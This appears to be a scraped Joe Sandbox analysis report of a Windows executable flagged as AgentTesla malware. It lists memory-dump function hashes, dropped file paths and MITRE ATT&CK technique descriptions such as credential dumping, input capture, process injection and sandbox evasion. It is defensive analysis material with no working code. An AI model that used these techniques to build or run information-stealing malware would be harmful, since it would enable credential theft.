Source File: 0000000D.00000002.4162764784.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_71c0000_cYDnGbgU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9770780942bc0c94ca430fc33ee66ca1c7eea47a6e7c31e4f767875bc2ed6242
Instruction ID: bb5290854ad27b904a9bb0ba957c4a3f578f5868b43dac45632163667cf9e7a9
Opcode Fuzzy Hash: 9770780942bc0c94ca430fc33ee66ca1c7eea47a6e7c31e4f767875bc2ed6242
Instruction Fuzzy Hash: BF014C71E202265BCF14CAB5EC416ADBB79FB8A710F10456EE849E7341E725DC06CBD1

Function 0189D03F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4147989376.000000000189D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0189D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_189d000_cYDnGbgU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
Instruction ID: 0bef0e27b12e5f60b1a2653fb79581297d820d2221e6178ad6b1a9da1eba6e55
Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
Instruction Fuzzy Hash: 5F11BE75504244CFDB12CF58C5C4B15FF62FB44314F28C6A9D8498B252C33AD44ACB61

Function 071C3950 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4162764784.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_71c0000_cYDnGbgU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ef224117f62558fb0a464827f92cd11994dc59a50fd3f8eac4cceaffb9d0fa1
Instruction ID: 75bd1494db5a2df5ba00b2af95a3af250a4da1858bbad33eb5a4c85156ec69e8
Opcode Fuzzy Hash: 5ef224117f62558fb0a464827f92cd11994dc59a50fd3f8eac4cceaffb9d0fa1
Instruction Fuzzy Hash: 4311CFB1D01219AFCB00DF9AD985ACEFBB4FB48310F10852AE918B7280C374A954CFA5

Function 071C3ED8 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4162764784.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_71c0000_cYDnGbgU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c13d32d80ba872a4833f890a7786f88a85be4ec61e47a4e7b2419ce51198f09
Instruction ID: 18edc6bf828cb7bc2dd631864ee3a022145f3a39c37aa0a5ad002a824d62cf15
Opcode Fuzzy Hash: 7c13d32d80ba872a4833f890a7786f88a85be4ec61e47a4e7b2419ce51198f09
Instruction Fuzzy Hash: 2D016D717001155BDB25D6ADD45072BB2DADBD9720F20C83EF11EC7394EA66DC428392

Function 071CEE48 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4162764784.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_71c0000_cYDnGbgU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb0c2b62062e2a40300a8a6d6271cf5826db03a8f1577374c9db0773cf98205d
Instruction ID: b37d6f626aad83595bc1b88cd436dd66b82673d44d5ee9857284859ebd330f0e
Opcode Fuzzy Hash: cb0c2b62062e2a40300a8a6d6271cf5826db03a8f1577374c9db0773cf98205d
Instruction Fuzzy Hash: 5801DCB17000261BCB22D6AD9450B2F73DADBC9A60F10883DE10AD7380EA69DC024385

Function 071C9FD0 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4162764784.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_71c0000_cYDnGbgU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32b1d22ce28cce47cc4f1a3aeb3b2656a27cc54e56cd0f89eae7e4c7e782419d
Instruction ID: efd6f118288a36666fa7fd978368218f6d9ee374bea53b0424a02a32325a8a43
Opcode Fuzzy Hash: 32b1d22ce28cce47cc4f1a3aeb3b2656a27cc54e56cd0f89eae7e4c7e782419d
Instruction Fuzzy Hash: 530181707000290FDB26DABCD45072AB7DAEB89B20F10C838E50AC7380EB39EC028781

Function 071C6138 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4162764784.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_71c0000_cYDnGbgU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72155f5dd77a33834b6642e64664258ac2545fc43a6ace87d31724ce0fc4d38d
Instruction ID: 30ac842124023a8e7dba841acb2be8d435372c1433e86c6e8f6a008a956317db
Opcode Fuzzy Hash: 72155f5dd77a33834b6642e64664258ac2545fc43a6ace87d31724ce0fc4d38d
Instruction Fuzzy Hash: 28F06DB190928AABCB12CBB58D4575EBBA9DB43244F24849AD844D7283E23ACA158742

Non-executed Functions

Function 071C7360 Relevance: 13.0, Strings: 10, Instructions: 468COMMON

Download Yara Rule

Strings

$dq, xrefs: 071C78D5
$dq, xrefs: 071C7479
$dq, xrefs: 071C7842
$dq, xrefs: 071C7485
$dq, xrefs: 071C7836
$dq, xrefs: 071C78E1
$dq, xrefs: 071C78F7
$dq, xrefs: 071C74AA
$dq, xrefs: 071C78EB
$dq, xrefs: 071C74B6

Memory Dump Source

Source File: 0000000D.00000002.4162764784.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_71c0000_cYDnGbgU.jbxd

Similarity

API ID:
String ID: $dq$$dq$$dq$$dq$$dq$$dq$$dq$$dq$$dq$$dq
API String ID: 0-3623093008
Opcode ID: 2c882c0a44f1d290257938ef16ba09009ba3226d1e29aca4661436582f2f0848
Instruction ID: 9df1f06964ec65112ef4e0acdba46bc7c0ba01cc34f9b9394445818115815d8a
Opcode Fuzzy Hash: 2c882c0a44f1d290257938ef16ba09009ba3226d1e29aca4661436582f2f0848
Instruction Fuzzy Hash: A1123E70A002198FDB24DFA9C954A5EB7F2FF99311F2095ADD409AB3A4DB709D41CF81

Function 071CA9F8 Relevance: 10.2, Strings: 8, Instructions: 229COMMON

Download Yara Rule

Strings

$dq, xrefs: 071CAAEE
$dq, xrefs: 071CAB49
$dq, xrefs: 071CAB74
$dq, xrefs: 071CAB80
$dq, xrefs: 071CAB55
$dq, xrefs: 071CABB6
$dq, xrefs: 071CAAFA
$dq, xrefs: 071CABAA

Memory Dump Source

Source File: 0000000D.00000002.4162764784.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_71c0000_cYDnGbgU.jbxd

Similarity

API ID:
String ID: $dq$$dq$$dq$$dq$$dq$$dq$$dq$$dq
API String ID: 0-634254105
Opcode ID: 14a4c43b11cb1b3ffe5aa6bcdf882ab2ed21c8638ea05814a06fcfcc8478bcb9
Instruction ID: fafe7ac77980199ec7c137e780a394326a2c7b2bf15f38e75abd4268d30b2ad3
Opcode Fuzzy Hash: 14a4c43b11cb1b3ffe5aa6bcdf882ab2ed21c8638ea05814a06fcfcc8478bcb9
Instruction Fuzzy Hash: CC919BB0A1020E9FDB2ADFA8D5547AEB7F6EF58311F20C42DE80197294CB749E41CB91

Function 071C6D60 Relevance: 9.2, Strings: 7, Instructions: 405COMMON

Download Yara Rule

Strings

$dq, xrefs: 071C7274
$dq, xrefs: 071C70A8
$dq, xrefs: 071C709C
.5|q, xrefs: 071C6DBB
$dq, xrefs: 071C71FC
$dq, xrefs: 071C7042
$dq, xrefs: 071C7268

Memory Dump Source

Source File: 0000000D.00000002.4162764784.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_71c0000_cYDnGbgU.jbxd

Similarity

API ID:
String ID: .5|q$$dq$$dq$$dq$$dq$$dq$$dq
API String ID: 0-3447281907
Opcode ID: 688244a22a550014140c58a7ad9a44a5eb4f7c6222fd2267364b4aa153207edc
Instruction ID: 9cc050b7b4fa25b2d1495a02de56673f1036089f6dc0327c79fc066e4f3b7f0c
Opcode Fuzzy Hash: 688244a22a550014140c58a7ad9a44a5eb4f7c6222fd2267364b4aa153207edc
Instruction Fuzzy Hash: 02F14B70B002098FDB19EFA8D454A6EB7F6FF99301F208928D4059B394CBB5ED42CB81

Function 071C8098 Relevance: 5.3, Strings: 4, Instructions: 282COMMON

Download Yara Rule

Strings

$dq, xrefs: 071C82F2
$dq, xrefs: 071C82FE
$dq, xrefs: 071C8357
$dq, xrefs: 071C8363

Memory Dump Source

Source File: 0000000D.00000002.4162764784.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_71c0000_cYDnGbgU.jbxd

Similarity

API ID:
String ID: $dq$$dq$$dq$$dq
API String ID: 0-185584874
Opcode ID: 00a71b7a5047fd905b07b88531cff765024c6e93a324259b6b543387c6d6df42
Instruction ID: 3d5788c6becfcd46bd93549978126ebe4353b3725b985563d9c8836f245e402c
Opcode Fuzzy Hash: 00a71b7a5047fd905b07b88531cff765024c6e93a324259b6b543387c6d6df42
Instruction Fuzzy Hash: BDB13B70A0021ACFDB25EBA8D5946AEB7F2FF95311F248829D405DB394DB75DC82CB81

Function 071C84B0 Relevance: 5.2, Strings: 4, Instructions: 168COMMON

Download Yara Rule

Strings

$dq, xrefs: 071C853B
$dq, xrefs: 071C852F
LRdq, xrefs: 071C85A3
LRdq, xrefs: 071C85F2

Memory Dump Source

Source File: 0000000D.00000002.4162764784.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_71c0000_cYDnGbgU.jbxd

Similarity

API ID:
String ID: LRdq$LRdq$$dq$$dq
API String ID: 0-340319088
Opcode ID: 402d3dfee498c7444931e7c2b37d15ea2c5eb0e3525662203eece0838dcd6584
Instruction ID: f2c5f7572c166a23bf34ef7564aa20d45b138546059d140ab5f1f9c656f2eb9d
Opcode Fuzzy Hash: 402d3dfee498c7444931e7c2b37d15ea2c5eb0e3525662203eece0838dcd6584
Instruction Fuzzy Hash: 9851B1707002128FCB18EB68D584A6AB7F6FF99304F10896DE405DB3A4DB74EC41CB91

Function 071CAD83 Relevance: 5.2, Strings: 4, Instructions: 161COMMON

Download Yara Rule

Strings

$dq, xrefs: 071CAF04
$dq, xrefs: 071CAF33
$dq, xrefs: 071CAF5C
$dq, xrefs: 071CAEB1

Memory Dump Source

Source File: 0000000D.00000002.4162764784.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_71c0000_cYDnGbgU.jbxd

Similarity

API ID:
String ID: $dq$$dq$$dq$$dq
API String ID: 0-185584874
Opcode ID: 4e22ab2bd6fe78029a6c31419bfe8384b09a6febadacea5952b84844c94f9f4c
Instruction ID: 92ca3c8421f073d5025021ff4159a9c17ca484df8e839b7d9f933250749d286c
Opcode Fuzzy Hash: 4e22ab2bd6fe78029a6c31419bfe8384b09a6febadacea5952b84844c94f9f4c
Instruction Fuzzy Hash: F45173B0A0020A8FCF27DBA8D5806AE77F6EF99311F24856ED405D7294DB35DD42CB91

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report F#U0130YAT TEKL#U0130F#U0130-2400.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\F#U0130YAT TEKL#U0130F#U0130-2400.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\cYDnGbgU.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1b0u5lci.axx.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3pvbbt4a.q02.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cdqy43ny.qki.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eyvn1cx1.4ko.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ineb0hdf.0j1.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iu2k0ppq.5iv.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kqsi2qr4.ypv.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oty4fs3k.q2i.ps1

C:\Users\user\AppData\Local\Temp\tmp38F1.tmp

C:\Users\user\AppData\Local\Temp\tmp4A37.tmp

Windows Analysis Report
F#U0130YAT TEKL#U0130F#U0130-2400.exe

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre